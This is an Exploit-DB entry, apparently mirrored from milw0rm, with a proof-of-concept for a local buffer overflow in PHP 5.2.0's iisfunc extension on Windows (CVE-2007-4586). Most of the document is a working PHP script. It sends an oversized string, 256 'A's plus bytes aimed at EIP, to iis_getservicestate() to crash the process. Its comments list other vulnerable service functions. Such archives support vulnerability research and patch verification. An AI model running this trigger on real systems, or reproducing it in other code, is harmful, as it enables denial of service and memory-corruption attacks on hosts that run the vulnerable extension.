EXPLOITS

PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow

Author: boecke
type: dos
platform: windows_x86
port: 
date_added: 2007-08-26  
date_updated: 2016-10-19  
verified: 1  
codes: OSVDB-36847;CVE-2007-4586  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphp-5.2.0-Win32.zip  

raw file: 4318.php  

<?php
// ==================================================================================
//
//  php_iisfunc.dll PHP <= 5.2.0 (win32) Buffer Overflow PoC
//
//      Discovery: boecke <boecke@herzeleid.net>
//      Risk: Local Buffer Overflow (Medium - High Risk)
//      Notes: Various other functions are exploitable, all of which convert the
//      string argument(s) to unicode.
//
//      extern "C" IISFUNC_API int fnStartService(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnGetServiceState(LPCTSTR ServiceId);
//      extern "C" IISFUNC_API int fnStopService(LPCTSTR ServiceId);
//
//      "Sangre, sonando, de rabia naci.. Who do you trust?"
//       - Cygnus, Vismund Cygnus: Sarcophagi
//
// ==================================================================================

if ( !extension_loaded( "iisfunc" ) )
{
       die( "Extension not loaded.\n" );
}

$buf_unicode = str_repeat( "A", 256 );
$eip_unicode = "\x41\x41";

iis_getservicestate( $buf_unicode . $eip_unicode );

?>

# milw0rm.com [2007-08-27]